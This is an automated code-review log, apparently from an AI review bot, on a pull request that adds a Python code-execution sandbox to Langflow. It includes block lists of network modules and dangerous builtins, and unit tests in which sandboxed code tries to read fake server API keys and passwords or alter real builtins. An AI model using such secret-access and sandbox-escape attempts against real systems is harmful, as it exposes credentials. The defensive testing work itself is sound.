#!/bin/bash
# Read the test file around line 139 and the full test functions in question
sed -n '136,220p' ./src/backend/tests/unit/api/v1/test_validate.py

Length of output: 3605



---

🏁 Script executed:

#!/bin/bash
# Read create_isolated_import function from sandbox.py
cat ./src/lfx/src/lfx/custom/sandbox.py | grep -A 30 "def create_isolated_import"

Length of output: 1546


🏁 Script executed:

#!/bin/bash
# Search for any runtime modification of BLOCKED_MODULES
rg -n "BLOCKED_MODULES\s*=" ./src/lfx/src/lfx/custom/sandbox.py
rg -n "BLOCKED_MODULES\." ./src/lfx/src/lfx/custom/ -A 2 -B 2

Length of output: 0


🏁 Script executed:

#!/bin/bash
# Check if there are any fixture or setup functions that modify sandbox behavior in tests
sed -n '1,150p' ./src/backend/tests/unit/api/v1/test_validate.py | head -80

Length of output: 2882


Fix unused result variable and address test failure due to blocked requests module

Two issues confirmed:

  1. Line 139 — Unused variable (Ruff F841): result = response.json() is assigned but never used. Either remove the assignment or assert on it (e.g., to confirm the sandbox blocked the module).

  2. test_validate_code_allows_third_party_libraries (lines 199–213) — Test will fail: The test imports requests and expects len(result["imports"]["errors"]) == 0, but requests is explicitly in BLOCKED_MODULES as a dangerous network module. When isolated_import tries to load requests, it raises SecurityViolation, which validate_code catches and appends to the errors list. The assertion will fail.

Choose one approach:

  • Remove requests and httpx from BLOCKED_MODULES if network access should be allowed during validation, or
  • Rewrite the test to skip the assertion if the module is blocked, or gate it with pytest.importorskip("requests") and adjust expectations based on your sandbox policy (a sketch of this approach follows below).
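
A hedged sketch of the second option; the endpoint path, fixtures, and response shape mirror the existing tests above, while the tolerant assertion is an assumption about the desired policy, not committed code:

```python
import pytest
from fastapi import status
from httpx import AsyncClient


@pytest.mark.usefixtures("active_user")
async def test_third_party_import_respects_sandbox_policy(client: AsyncClient, logged_in_headers):
    pytest.importorskip("requests")  # skip entirely when requests isn't installed
    code = "import requests\n\ndef test():\n    return True\n"
    response = await client.post("api/v1/validate/code", json={"code": code}, headers=logged_in_headers)
    assert response.status_code == status.HTTP_200_OK
    errors = response.json()["imports"]["errors"]
    # Accept both outcomes: the sandbox either allows the import (no errors)
    # or blocks it and reports an error mentioning the module.
    assert errors == [] or any("requests" in str(err) for err in errors)
```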
🧰 Tools
🪛 GitHub Actions: Ruff Style Check

[error] 139-139: F841 Local variable result is assigned to but never used.

🪛 GitHub Check: Ruff Style Check (3.13)

[failure] 139-139: Ruff (F841)
src/backend/tests/unit/api/v1/test_validate.py:139:5: F841 Local variable result is assigned to but never used

🤖 Prompt for AI Agents
In src/backend/tests/unit/api/v1/test_validate.py around lines 136–213, fix two
issues: at ~line 139 remove the unused assignment `result = response.json()` (or
replace it with an assertion using `result` if you intended to validate response
content); and for the third-party import test (lines ~199–213) change the test
to handle the sandbox policy: use pytest.importorskip("requests") to skip the
test when requests is not available, or update the assertions to accept both
outcomes (if the sandbox blocks network modules then expect an imports error,
otherwise expect zero import errors) so the test reflects whether `requests` is
allowed by BLOCKED_MODULES.

Comment on lines +17 to +18
class SecurityViolation(Exception):
    """Raised when code attempts to escape the sandbox or use blocked operations."""

⚠️ Potential issue | 🟡 Minor

Address Ruff violations: exception naming, long messages, and simple try/except

Ruff is flagging several style issues here:

  • Line 17: SecurityViolation violates N818 (exception names should end with Error). Either rename the class (e.g., SecurityViolationError) or add a local suppression like class SecurityViolation(Exception): # noqa: N818 if you prefer the current name.

  • Lines 105–108: The try/except AttributeError: pass around getattr(builtins, name) can be simplified using contextlib.suppress(AttributeError):

-import builtins
+import builtins
+import contextlib
@@
-    for name in dir(builtins):
-        if not name.startswith("_"):
-            # Block dangerous builtins unless explicitly allowed
-            if not ALLOW_DANGEROUS_CODE and name in BLOCKED_BUILTINS:
-                continue
-            try:
-                isolated_builtins[name] = getattr(builtins, name)
-            except AttributeError:
-                pass
+    for name in dir(builtins):
+        if not name.startswith("_"):
+            if not ALLOW_DANGEROUS_CODE and name in BLOCKED_BUILTINS:
+                continue
+            with contextlib.suppress(AttributeError):
+                isolated_builtins[name] = getattr(builtins, name)
  • Lines ~128–130 and ~160–162: Raising SecurityViolation with long f-strings trips EM102/TRY003/E501. Factor the message into a variable and pass it to the exception:
-            if not ALLOW_DANGEROUS_CODE and name in BLOCKED_BUILTINS:
-                raise SecurityViolation(
-                    f"Dangerous builtin '{name}' is blocked. "
-                    f"Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow."
-                )
+            if not ALLOW_DANGEROUS_CODE and name in BLOCKED_BUILTINS:
+                msg = (
+                    f"Dangerous builtin '{name}' is blocked. "
+                    "Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow."
+                )
+                raise SecurityViolation(msg)
@@
-            if module_name in BLOCKED_MODULES:
-                raise SecurityViolation(
-                    f"Dangerous module '{module_name}' is blocked. "
-                    f"Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow."
-                )
+            if module_name in BLOCKED_MODULES:
+                msg = (
+                    f"Dangerous module '{module_name}' is blocked. "
+                    "Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow."
+                )
+                raise SecurityViolation(msg)

These changes should clear the current Ruff complaints without altering sandbox behavior; a consolidated sketch follows below.

Also applies to: 96-139, 152-163
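
For reference, a consolidated, runnable sketch of the Ruff-friendly pattern described above; the class name and message text follow the suggestion, and ALLOW_DANGEROUS_CODE / BLOCKED_BUILTINS are stand-ins for the real module constants, not the actual sandbox code:

```python
import builtins
import contextlib


class SecurityViolationError(Exception):
    """Raised when sandboxed code uses a blocked operation."""


ALLOW_DANGEROUS_CODE = False
BLOCKED_BUILTINS = {"eval", "exec", "open", "compile"}


def copy_safe_builtins() -> dict:
    # contextlib.suppress replaces the try/except AttributeError: pass pattern.
    isolated: dict = {}
    for name in dir(builtins):
        if not name.startswith("_"):
            if not ALLOW_DANGEROUS_CODE and name in BLOCKED_BUILTINS:
                continue
            with contextlib.suppress(AttributeError):
                isolated[name] = getattr(builtins, name)
    return isolated


def check_builtin(name: str) -> None:
    if not ALLOW_DANGEROUS_CODE and name in BLOCKED_BUILTINS:
        # Assign the message first so EM102/TRY003 are satisfied.
        msg = (
            f"Dangerous builtin '{name}' is blocked. "
            "Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow."
        )
        raise SecurityViolationError(msg)


safe = copy_safe_builtins()
assert "print" in safe and "eval" not in safe

try:
    check_builtin("eval")
except SecurityViolationError as err:
    print(err)
```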

🧰 Tools
🪛 GitHub Check: Ruff Style Check (3.13)

[failure] 17-17: Ruff (N818)
src/lfx/src/lfx/custom/sandbox.py:17:7: N818 Exception name SecurityViolation should be named with an Error suffix

🤖 Prompt for AI Agents
In src/lfx/src/lfx/custom/sandbox.py around lines 17-18, 96-139, 152-163, update
exception naming and simplify/clean up try/except and long exception messages:
rename SecurityViolation to SecurityViolationError (or add a local noqa: N818
comment) to satisfy N818; replace try/except AttributeError blocks around
getattr(builtins, name) with contextlib.suppress(AttributeError) to simplify
control flow; and refactor any long f-string messages used in raise
SecurityViolation(...) into a separately assigned message variable (message =
f"...") and then raise the exception with that variable (raise
SecurityViolationError(message)) to avoid EM102/TRY003/E501 style violations.
Ensure imports are added (contextlib) and update all occurrences consistently
without changing runtime behavior.

Comment on lines +111 to +139
    essential_underscore_builtins = ["__name__", "__doc__", "__package__", "__loader__", "__spec__"]
    for name in essential_underscore_builtins:
        if hasattr(builtins, name):
            isolated_builtins[name] = getattr(builtins, name)

    # Critical: Make __builtins__ point to this isolated copy, not the real one
    # This prevents code from accessing the real builtins module
    isolated_builtins["__builtins__"] = isolated_builtins.copy()

    # Prevent access to the real builtins module
    # If code tries to import builtins, they get our isolated version
    class IsolatedBuiltinsModule:
        """Fake builtins module that prevents escaping."""

        def __getattr__(self, name: str) -> Any:
            # Block dangerous builtins unless explicitly allowed
            if not ALLOW_DANGEROUS_CODE and name in BLOCKED_BUILTINS:
                raise SecurityViolation(
                    f"Dangerous builtin '{name}' is blocked. Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow."
                )
            if name == "__builtins__":
                return isolated_builtins
            if hasattr(builtins, name):
                return getattr(builtins, name)
            raise AttributeError(f"module 'builtins' has no attribute '{name}'")

    isolated_builtins["builtins"] = IsolatedBuiltinsModule()

    return isolated_builtins

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

Include __build_class__ in isolated builtins to support class definitions inside the sandbox

create_isolated_builtins currently copies only non-underscore names from builtins and then manually whitelists a few underscored ones ("__name__", "__doc__", etc.). It does not include __build_class__, which Python uses whenever a class statement is executed.

Consequence: executing code that actually runs a class definition within the sandbox (e.g., top-level class Foo: ... in code passed to execute_in_sandbox) will fail with NameError: __build_class__ is not defined, even when the code is otherwise totally benign. That’s surprising for callers and will make it hard to sandbox any code that defines classes.

You should add __build_class__ to the essential underscore builtins so it’s available in the sandbox:

-    essential_underscore_builtins = ["__name__", "__doc__", "__package__", "__loader__", "__spec__"]
+    essential_underscore_builtins = [
+        "__name__",
+        "__doc__",
+        "__package__",
+        "__loader__",
+        "__spec__",
+        "__build_class__",  # Needed for executing class definitions
+    ]

This keeps class definitions functional inside the sandbox without weakening your security guarantees.

Also applies to: 179-236


🏁 Script executed:

#!/bin/bash
# Demonstrate the need for __build_class__ when executing a class definition in the sandbox.
python - << 'PY'
from lfx.custom.sandbox import create_isolated_builtins, execute_in_sandbox
import ast

code = "class Foo:\n    pass\n"
code_obj = compile(code, "<sandbox-test>", "exec")
globals_ctx = {}

try:
    execute_in_sandbox(code_obj, globals_ctx)
    print("Executed class definition successfully")
except Exception as e:
    print("Exception during sandboxed class definition:", type(e).__name__, e)
PY

Length of output: 115



---

🏁 Script executed:

#!/bin/bash
# Locate the sandbox.py file
fd -type f -name "sandbox.py"

Length of output: 170


🏁 Script executed:

#!/bin/bash
# Examine the create_isolated_builtins function and surrounding context
cat src/lfx/src/lfx/custom/sandbox.py | head -200

Length of output: 7266


🏁 Script executed:

#!/bin/bash
# Search for any references to __build_class__ in the sandbox.py file
rg -n "__build_class__" src/lfx/src/lfx/custom/sandbox.py

Length of output: 0


🏁 Script executed:

#!/bin/bash
# Search for essential_underscore_builtins in the file
rg -n "essential_underscore_builtins" src/lfx/src/lfx/custom/sandbox.py -A 5

Length of output: 419



---

🏁 Script executed:

#!/bin/bash
# Examine lines 150-250 to see execute_in_sandbox and the second location (179-236)
sed -n '150,250p' src/lfx/src/lfx/custom/sandbox.py

Length of output: 3954


🏁 Script executed:

#!/bin/bash
# Search for all uses of execute_in_sandbox to understand the impact
rg -n "execute_in_sandbox" src/lfx/src/lfx/custom/sandbox.py -B 2 -A 2

Length of output: 155


Add __build_class__ to essential underscore builtins to support class definitions inside the sandbox

The verification confirms the issue: __build_class__ is missing from the essential_underscore_builtins list at line 111, and Python requires this builtin whenever a class statement executes. Any code that defines a class inside the sandbox will therefore fail with NameError: __build_class__ is not defined.

The suggested fix is correct and necessary:

-    essential_underscore_builtins = ["__name__", "__doc__", "__package__", "__loader__", "__spec__"]
+    essential_underscore_builtins = [
+        "__name__",
+        "__doc__",
+        "__package__",
+        "__loader__",
+        "__spec__",
+        "__build_class__",  # Needed for executing class definitions
+    ]

Apply this change at line 111 in src/lfx/src/lfx/custom/sandbox.py.
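
A plain-CPython demonstration of the underlying behavior (independent of the Langflow sandbox and assuming nothing beyond the standard library): a restricted builtins mapping needs __build_class__ before class statements can execute.

```python
import builtins

code = compile("class Foo:\n    pass\n", "<demo>", "exec")

# Without __build_class__ in the restricted builtins, the class statement fails.
try:
    exec(code, {"__builtins__": {}})
except NameError as err:
    print("blocked:", err)  # CPython reports that __build_class__ is missing

# Copying __build_class__ (plus __name__ for the implicit __module__ lookup)
# into the restricted environment lets class definitions run again.
safe_globals = {
    "__builtins__": {"__build_class__": builtins.__build_class__},
    "__name__": "sandbox_demo",
}
exec(code, safe_globals)
print("allowed:", safe_globals["Foo"])
```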

🧰 Tools
🪛 GitHub Check: Ruff Style Check (3.13)

[failure] 135-135: Ruff (EM102)
src/lfx/src/lfx/custom/sandbox.py:135:34: EM102 Exception must not use an f-string literal, assign to variable first


[failure] 135-135: Ruff (TRY003)
src/lfx/src/lfx/custom/sandbox.py:135:19: TRY003 Avoid specifying long messages outside the exception class


[failure] 129-129: Ruff (E501)
src/lfx/src/lfx/custom/sandbox.py:129:121: E501 Line too long (121 > 120)


[failure] 129-129: Ruff (EM102)
src/lfx/src/lfx/custom/sandbox.py:129:21: EM102 Exception must not use an f-string literal, assign to variable first


[failure] 128-130: Ruff (TRY003)
src/lfx/src/lfx/custom/sandbox.py:128:23: TRY003 Avoid specifying long messages outside the exception class

🤖 Prompt for AI Agents
In src/lfx/src/lfx/custom/sandbox.py around lines 111 to 139, the list
essential_underscore_builtins is missing "__build_class__", causing any class
definition inside the sandbox to raise NameError; add "__build_class__" to that
list so the sandbox provides the class-construction builtin, ensuring class
statements work correctly while keeping the rest of the isolated builtins
behavior unchanged.

Comment on lines +11 to +145
def test_sandbox_cannot_access_parent_globals():
"""Test that sandboxed code cannot access parent function's globals."""
# Set a variable in the parent scope
parent_var = "should_not_be_accessible"

code = """
def test():
# Try to access parent_var from parent scope
# If isolation were broken, this would work
return parent_var
"""
code_obj = compile(code, "<test>", "exec")
exec_globals = {}

# Execute in sandbox
execute_in_sandbox(code_obj, exec_globals)

# Try to call the function
test_func = exec_globals["test"]

# Should raise NameError because parent_var is not accessible
with pytest.raises(NameError):
test_func()


def test_sandbox_cannot_modify_parent_globals():
"""Test that sandboxed code cannot modify parent scope's globals."""
parent_dict = {"value": "original"}

code = """
def test():
# Try to modify parent_dict
# If isolation were broken, this would modify the real parent_dict
parent_dict["value"] = "modified"
return parent_dict["value"]
"""
code_obj = compile(code, "<test>", "exec")
exec_globals = {}

execute_in_sandbox(code_obj, exec_globals)

# Call the function - should fail because parent_dict is not accessible
test_func = exec_globals["test"]

with pytest.raises(NameError):
test_func()

# Verify parent_dict was not modified
assert parent_dict["value"] == "original"


def test_sandbox_isolated_builtins():
"""Test that sandbox uses isolated builtins, not real ones."""
# Create a marker in real builtins (simulating server state)
import builtins

original_builtins_len = len(dir(builtins))

code = """
def test():
import builtins
# Try to access real builtins
# If isolation were broken, we could modify real builtins
builtins.ESCAPE_TEST = "should_not_exist"
return hasattr(builtins, 'ESCAPE_TEST')
"""
code_obj = compile(code, "<test>", "exec")
exec_globals = {}

execute_in_sandbox(code_obj, exec_globals)

# Call the function
test_func = exec_globals["test"]
result = test_func()

# Should return False or True but not affect real builtins
# Verify real builtins wasn't modified
assert not hasattr(builtins, "ESCAPE_TEST")
assert len(dir(builtins)) == original_builtins_len


def test_sandbox_fresh_namespace_per_execution():
"""Test that each execution gets a fresh isolated namespace."""
code1 = """
GLOBAL_VAR = "first_execution"
def test():
return GLOBAL_VAR
"""
code_obj1 = compile(code1, "<test>", "exec")
exec_globals1 = {}
execute_in_sandbox(code_obj1, exec_globals1)

# Second execution with different code
code2 = """
def test():
# Try to access GLOBAL_VAR from previous execution
# If isolation were broken, this would work
return GLOBAL_VAR
"""
code_obj2 = compile(code2, "<test>", "exec")
exec_globals2 = {}
execute_in_sandbox(code_obj2, exec_globals2)

# Should raise NameError because GLOBAL_VAR doesn't exist in this execution
test_func = exec_globals2["test"]
with pytest.raises(NameError):
test_func()


def test_sandbox_cannot_access_frame_locals():
"""Test that sandboxed code cannot access caller's local variables."""

def caller_function():
local_var = "should_not_be_accessible"

code = """
def test():
# Try to access local_var from caller
# If isolation were broken, this would work
return local_var
"""
code_obj = compile(code, "<test>", "exec")
exec_globals = {}

execute_in_sandbox(code_obj, exec_globals)

# Call the function
test_func = exec_globals["test"]

# Should raise NameError because local_var is not accessible
with pytest.raises(NameError):
test_func()

caller_function()


⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

Sandbox tests assume exec_globals is mutated, but execute_in_sandbox does not currently do that

Across these tests you call:

exec_globals = {}
execute_in_sandbox(code_obj, exec_globals)
test_func = exec_globals["test"]

and then assert behavior by calling test_func() (e.g., expecting NameError). However, execute_in_sandbox creates its own sandbox_globals dict, updates it with exec_globals, and never writes symbols back into exec_globals. As a result exec_globals stays empty and exec_globals["test"] will raise KeyError before any of the pytest.raises(...) blocks are exercised.

You likely want one of:

  • Keep sandbox one‑way (safer) and update tests to assert on errors from execute_in_sandbox itself, or to evaluate access attempts at module level inside the sandboxed code (so execute_in_sandbox raises the NameError/SecurityViolation you check), rather than trying to call sandboxed functions via exec_globals; or
  • Change execute_in_sandbox’s contract so it exports selected symbols (e.g., top‑level defs) back into exec_globals after execution, then your exec_globals["test"] pattern would work, but that does loosen the API surface of the sandbox.

Right now, as written, these tests won’t be validating isolation properties but will instead fail on lookup of "test".

Also applies to: 179-220


🏁 Script executed:

#!/bin/bash
# Verify current execute_in_sandbox behavior with respect to exec_globals.
python - << 'PY'
from lfx.custom.sandbox import execute_in_sandbox
import ast

code = "def test():\n    return 42\n"
code_obj = compile(code, "<test>", "exec")
exec_globals = {}
execute_in_sandbox(code_obj, exec_globals)
print("exec_globals keys after execute_in_sandbox:", list(exec_globals.keys()))
PY

Length of output: 115



---

🏁 Script executed:

#!/bin/bash
# Locate execute_in_sandbox function definition
rg -n "def execute_in_sandbox" --type=py

Length of output: 114


🏁 Script executed:

#!/bin/bash
# Find sandbox-related module files
fd -e py "sandbox" --type f

Length of output: 136


🏁 Script executed:

#!/bin/bash
# Read execute_in_sandbox implementation
cat src/lfx/src/lfx/custom/sandbox.py | sed -n '179,250p'

Length of output: 2584


🏁 Script executed:

#!/bin/bash
# Check if test_sandbox_security.py has similar patterns or different approach
head -100 src/lfx/tests/unit/custom/test_sandbox_security.py

Length of output: 3707


Sandbox tests assume exec_globals is mutated, but execute_in_sandbox does not currently do that

Across these tests you call:

exec_globals = {}
execute_in_sandbox(code_obj, exec_globals)
test_func = exec_globals["test"]

and then assert behavior by calling test_func() (e.g., expecting NameError). However, execute_in_sandbox creates its own sandbox_globals dict, reads from exec_globals via update(), and never writes symbols back into exec_globals. As a result exec_globals stays empty and exec_globals["test"] will raise KeyError before any of the pytest.raises(...) blocks are exercised.

You likely want one of:

  • Keep sandbox one‑way (safer) and update tests to assert on errors from execute_in_sandbox itself, or to evaluate access attempts at module level inside the sandboxed code (so execute_in_sandbox raises the NameError/SecurityViolation you check), rather than trying to call sandboxed functions via exec_globals; or
  • Change execute_in_sandbox's contract so it exports selected symbols (e.g., top‑level defs) back into exec_globals after execution, then your exec_globals["test"] pattern would work, but that does loosen the API surface of the sandbox.

Right now, as written, these tests won't be validating isolation properties but will instead fail on lookup of "test".
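
A minimal illustration of the mechanics behind this point (plain Python, not the Langflow API; run_isolated is a made-up stand-in for execute_in_sandbox):

```python
def run_isolated(code_obj, exec_globals: dict) -> None:
    internal_globals = {"__builtins__": {}}
    internal_globals.update(exec_globals)  # caller globals are read, never written
    exec(code_obj, internal_globals)       # definitions land in internal_globals only


code_obj = compile("def test():\n    return 42\n", "<demo>", "exec")
caller_globals: dict = {}
run_isolated(code_obj, caller_globals)
print("test" in caller_globals)  # False, so caller_globals["test"] raises KeyError
```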

Comment on lines +29 to +31
server_api_key = "sk-secret-key-12345"
server_db_password = "db_password_secret"
server_config = {"api_key": server_api_key, "database_url": "postgresql://user:password@localhost/db"}

⚠️ Potential issue | 🟠 Major

Fake API keys will trigger gitleaks and other secret scanners

The hard‑coded strings like:

  • server_api_key = "sk-secret-key-12345" (Line 29)
  • self.api_key = "sk-secret-12345" (Line 63)

match generic API‑key patterns and are already being flagged by gitleaks. Even though these are clearly test values, they will cause CI noise or failures.

Consider changing them to values that don’t resemble real keys (and avoid common prefixes like sk-), e.g.:

-    server_api_key = "sk-secret-key-12345"
+    server_api_key = "FAKE_SERVER_API_KEY_FOR_TESTS"
@@
-            self.api_key = "sk-secret-12345"
+            self.api_key = "FAKE_SERVER_CONFIG_API_KEY_FOR_TESTS"

or add explicit allowlist annotations consistent with your secret‑scanning configuration.

Also applies to: 63-66
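
If you go the non-key-like route, one hedged option (names are hypothetical) is to source the fake credential from an environment variable with a clearly non-secret default:

```python
import os

# A value that no generic-api-key rule should match; override via env if needed.
server_api_key = os.environ.get("SANDBOX_TEST_FAKE_API_KEY", "test-api-key-1")
assert not server_api_key.startswith("sk-")
```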

🧰 Tools
🪛 Gitleaks (8.29.0)

[high] 29-29: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.

(generic-api-key)

🤖 Prompt for AI Agents
In src/lfx/tests/unit/custom/test_sandbox_security.py around lines 29-31 and
63-66, replace hard-coded strings that resemble real API keys (e.g. values with
sk- or sk-secret prefixes) with clearly non-secret test identifiers or reference
test fixtures/env vars, or add an explicit secret-scan allowlist annotation per
our CI configuration; ensure new values do not match common API-key patterns
(avoid prefixes like "sk-", long hex/base64 blobs, or "secret") and prefer
simple labels such as "test-api-key-1" or read the value from a test-only
config/env var, updating tests accordingly.

Comment on lines +33 to +50
code = """
def test():
# Try to access server's Python variables containing secrets
# If isolation is broken, these would be accessible
return server_api_key, server_db_password, server_config
"""
code_obj = compile(code, "<test>", "exec")
exec_globals = {}

execute_in_sandbox(code_obj, exec_globals)

# Call the function
test_func = exec_globals["test"]

# CRITICAL: Should raise NameError - server secrets are not accessible
# This is what prevents credential theft
with pytest.raises(NameError):
test_func()

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

exec_globals["test"] never populated by execute_in_sandbox

All tests in this file follow the pattern:

  1. exec_globals = {}
  2. execute_in_sandbox(code_obj, exec_globals)
  3. test_func = exec_globals["test"]
  4. with pytest.raises(NameError): test_func()

However, the current execute_in_sandbox implementation constructs its own sandbox_globals dict, merges exec_globals into it, and then executes exec(code_obj, sandbox_globals, sandbox_locals) without writing anything back to exec_globals. That means exec_globals remains empty and exec_globals["test"] will raise KeyError before your pytest.raises(NameError) assertions ever run. The same issue affects every test using this pattern (lines 33‑50, 69‑86, 98‑129, 140‑160, 172‑188, 195‑214, 226‑249, 261‑275).

Two options:

  • Adjust tests to assert on the exception raised by execute_in_sandbox itself (and call test() from within the code string), e.g.:
-    code = """
-def test():
-    # Try to access server's Python variables containing secrets
-    # If isolation is broken, these would be accessible
-    return server_api_key, server_db_password, server_config
-"""
+    code = """
+def test():
+    # Try to access server's Python variables containing secrets
+    # If isolation is broken, these would be accessible
+    return server_api_key, server_db_password, server_config
+
+# Call inside the sandbox so NameError is raised during execute_in_sandbox
+test()
+"""
@@
-    code_obj = compile(code, "<test>", "exec")
-    exec_globals = {}
-
-    execute_in_sandbox(code_obj, exec_globals)
-
-    # Call the function
-    test_func = exec_globals["test"]
-
-    # CRITICAL: Should raise NameError - server secrets are not accessible
-    # This is what prevents credential theft
-    with pytest.raises(NameError):
-        test_func()
+    code_obj = compile(code, "<test>", "exec")
+    exec_globals = {}
+
+    # CRITICAL: Should raise NameError - server secrets are not accessible
+    # This is what prevents credential theft
+    with pytest.raises(NameError):
+        execute_in_sandbox(code_obj, exec_globals)
  • Or, if the intended contract is that sandboxed definitions are exported back into exec_globals, update execute_in_sandbox to propagate selected names (e.g., functions) out of the internal sandbox_globals into exec_globals.

Right now, the tests and the sandbox API are not aligned, and the assertions won’t be exercising the intended NameError behavior.


🏁 Script executed:

#!/bin/bash
# Find execute_in_sandbox function definition
rg -n "def execute_in_sandbox" --type py

Length of output: 114


🏁 Script executed:

#!/bin/bash
# Find where execute_in_sandbox is imported/used in test file
rg -n "execute_in_sandbox" src/lfx/tests/unit/custom/test_sandbox_security.py -B2 -A2

Length of output: 1022


🏁 Script executed:

#!/bin/bash
# Get the full test file to understand structure
cat src/lfx/tests/unit/custom/test_sandbox_security.py

Length of output: 9640


🏁 Script executed:

#!/bin/bash
# Find all Python files that might contain execute_in_sandbox definition
fd -e py -x rg -l "def execute_in_sandbox" {} \;

Length of output: 35


🏁 Script executed:

#!/bin/bash
# Search more broadly for execute_in_sandbox in the codebase
rg -n "execute_in_sandbox" --type py -C3

Length of output: 12538


🏁 Script executed:

#!/bin/bash
# Get the execute_in_sandbox function implementation
sed -n '179,250p' src/lfx/src/lfx/custom/sandbox.py

Length of output: 2584


🏁 Script executed:

#!/bin/bash
# Get full sandbox.py file for complete context
cat src/lfx/src/lfx/custom/sandbox.py

Length of output: 8824


Tests fail with KeyError before asserting intended NameError behavior

The review comment is correct. In execute_in_sandbox, definitions created by exec(code_obj, sandbox_globals, sandbox_locals) are placed into sandbox_globals, not the passed-in exec_globals parameter. Since exec_globals is never updated after execution, the test pattern fails at exec_globals["test"] with KeyError before the NameError assertions can run.

This affects all tests in the file: lines 33–50, 69–86, 98–129, 140–160, 172–188, 195–214, 226–249, 261–275.

Choose one solution:

  1. Move the function call into the code string so NameError is raised during execute_in_sandbox:
code = """
def test():
    return server_api_key, server_db_password, server_config
test()
"""
with pytest.raises(NameError):
    execute_in_sandbox(code_obj, exec_globals)
  2. Update execute_in_sandbox to propagate selected definitions (e.g., functions) back into exec_globals after execution; a rough sketch of this write-back follows below.
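
A rough sketch of that write-back contract, assuming a policy of exporting only new top-level callables; this is illustrative, not the actual Langflow implementation:

```python
def execute_and_export(code_obj, exec_globals: dict) -> dict:
    sandbox_globals = {"__builtins__": {}}
    sandbox_globals.update(exec_globals)
    exec(code_obj, sandbox_globals)
    # Copy new top-level callables back so callers can do exec_globals["test"].
    for name, value in sandbox_globals.items():
        if name != "__builtins__" and callable(value) and name not in exec_globals:
            exec_globals[name] = value
    return exec_globals
```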
